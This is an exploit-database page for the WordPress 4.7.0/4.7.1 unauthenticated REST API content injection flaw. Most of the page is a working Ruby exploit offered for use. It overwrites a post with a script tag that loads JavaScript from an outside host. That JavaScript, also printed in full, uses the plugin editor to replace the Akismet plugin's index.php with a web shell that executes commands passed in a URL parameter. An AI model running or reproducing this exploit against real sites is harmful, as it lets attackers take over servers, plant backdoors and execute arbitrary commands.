WordPress 4.7.0/4.7.1 Unauthenticated Content Injection

2017.02.02
Credit: Harsh Jaiswal
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: WP Content Injection Shell Exploit # Date: 31 Jan' 2017 # Exploit Author: Harsh Jaiswal # Vendor Homepage: http://wordpress.org # Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2) # Tested on: Bacbox ubuntu Linux # Based on: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html # This will inject js in post, which on execution will change akismet plugin index.php file to our backdoor (brute parameter) :) # Credits : Marc, Sucuri, Brute # Lang : Ruby require 'rest-client' require 'json' puts "Enter Target URI (With wp directory)" targeturi = gets.chomp puts "Enter Post ID" postid = gets.chomp.to_i response = RestClient.post( "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}", { "id" => "#{postid}justtryingshell", "title" => "Shell Access Exploit", "content" => "Web shell access exploit <script src='http://yourjavascript.com/2211227783/wprce.js'></script>" }.to_json, :content_type => :json, :accept => :json ) {|response, request, result| response } if(response.code == 200) puts "Done! After js execution in admin panel, you will have shell access at '#{targeturi}/wp-content/plugins/akismet/index.php?brute=id'" else puts "This site is not Vulnerable" end #--- wprce.js --- # x=new XMLHttpRequest() p='/wp-admin/plugin-editor.php?' f='file=akismet/index.php' x.open('GET',p+f,0) x.send() $='_wpnonce='+/ce" value="([^"]*?)"/.exec(x.responseText)[1]+'&newcontent=<?=`$_GET[brute]`;&action=update&'+f x.open('POST',p+f,1) x.setRequestHeader('Content-Type','application/x-www-form-urlencoded') x.send($) #--- EOF --- #


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top